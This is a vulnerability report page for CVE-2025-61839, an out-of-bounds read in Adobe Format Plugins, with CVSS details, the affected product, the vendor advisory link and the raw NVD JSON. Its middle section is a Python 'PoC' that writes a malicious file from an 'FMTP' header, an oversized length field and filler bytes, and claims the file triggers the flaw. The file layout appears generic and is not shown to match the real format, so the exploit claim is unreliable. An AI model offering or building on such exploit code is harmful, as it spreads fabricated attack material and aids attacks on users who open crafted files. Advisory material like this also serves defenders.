Security Vulnerability Report
CVE-2025-61839 CVSS 7.8 HIGH

Published: 2025-11-11 19:15:36
Last Modified: 2025-11-13 15:19:50

Description

Format Plugins versions 1.1.1 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:* - VULNERABLE
Adobe Format Plugins <= 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct
import os


def create_malicious_file(filename):
    """
    PoC for CVE-2025-61839 - Adobe Format Plugins Out-of-Bounds Read
    This creates a crafted file that triggers an out-of-bounds read vulnerability
    when parsed by Format Plugins versions <= 1.1.1
    """
    # Craft a malicious file header with oversized data length field
    header = b'FMTP'  # Format Plugin signature
    header += struct.pack('<I', 0xFFFFFFFF)  # Malicious oversized length field
    header += b'\x00' * 100  # Padding to trigger OOB read

    # Add malicious data that extends beyond buffer boundaries
    malicious_data = b'A' * 1000  # Data that will be read out of bounds

    with open(filename, 'wb') as f:
        f.write(header + malicious_data)

    print(f"[+] Created malicious file: {filename}")
    print(f"[+] File size: {os.path.getsize(filename)} bytes")


if __name__ == '__main__':
    create_malicious_file('CVE-2025-61839.malicious')
    print("[+] PoC file created. Users must open this file with Adobe Format Plugins to trigger the vulnerability.")

References

https://helpx.adobe.com/security/products/formatplugins/apsb25-114.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61839", "sourceIdentifier": "[email protected]", "published": "2025-11-11T19:15:35.607", "lastModified": "2025-11-13T15:19:50.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Format Plugins versions 1.1.1 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:format_plugins:-:*:*:*:*:*:*:*", "matchCriteriaId": "9FE89744-A347-4449-8733-D54CA0E25723"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/formatplugins/apsb25-114.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}